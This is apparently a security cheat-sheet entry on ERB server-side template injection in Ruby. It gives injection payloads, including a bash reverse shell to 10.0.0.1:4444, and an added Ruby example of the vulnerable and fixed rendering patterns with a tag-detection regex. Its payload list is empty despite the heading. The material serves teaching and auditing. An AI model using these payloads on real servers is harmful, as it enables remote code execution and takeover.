ERB SSTI
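ERB (Embedded Ruby) templates may be vulnerable to server-side template injection (SSTI) when user input is rendered as part of the template source.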
Payloads
Try the following payloads in the URL path, parameters, input fields, etc.
Exploit
If the above payloads affect responses, we can inject arbitrary code as below:
<%= system("ping -c 1 10.0.0.1"); %>
# Reverse Shell
<%= system("bash -i >& /dev/tcp/10.0.0.1/4444 0>&1"); %>
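Root cause and fix, as an added example that is not from the original page: the payloads above execute only when user input becomes part of the ERB template source. The Ruby code below contrasts that pattern with a fixed template that receives input as data; the function names and the harmless arithmetic probe are constructed for illustration.

```ruby
require "erb"

# Constructed sample input: a harmless arithmetic probe standing in for
# user-controlled data such as a query parameter.
PROBE = "<%= 7 * 7 %>"

# Vulnerable pattern: user input is concatenated into the template *source*,
# so any ERB tags it contains are compiled and evaluated on the server.
def render_vulnerable(name)
  ERB.new("Hello, " + name + "!").result(binding)
end

# Hardened pattern: the template source is a fixed string. User input is
# only a value referenced by the template, and is HTML-escaped on output.
SAFE_TEMPLATE = ERB.new("Hello, <%= ERB::Util.html_escape(name) %>!")

def render_safe(name)
  SAFE_TEMPLATE.result_with_hash(name: name)
end

# Review and logging aid: flag input that carries ERB tag delimiters.
# This supports detection; it does not replace the fix above.
def contains_erb_tags?(input)
  input.match?(/<%|%>/)
end

if __FILE__ == $0
  puts render_vulnerable(PROBE)  # input was evaluated as Ruby
  puts render_safe(PROBE)        # input was treated as text
  puts contains_erb_tags?(PROBE)
end
```

When auditing a Rails code base, the same distinction applies to `render inline:` with interpolated request data versus rendering a fixed view with locals.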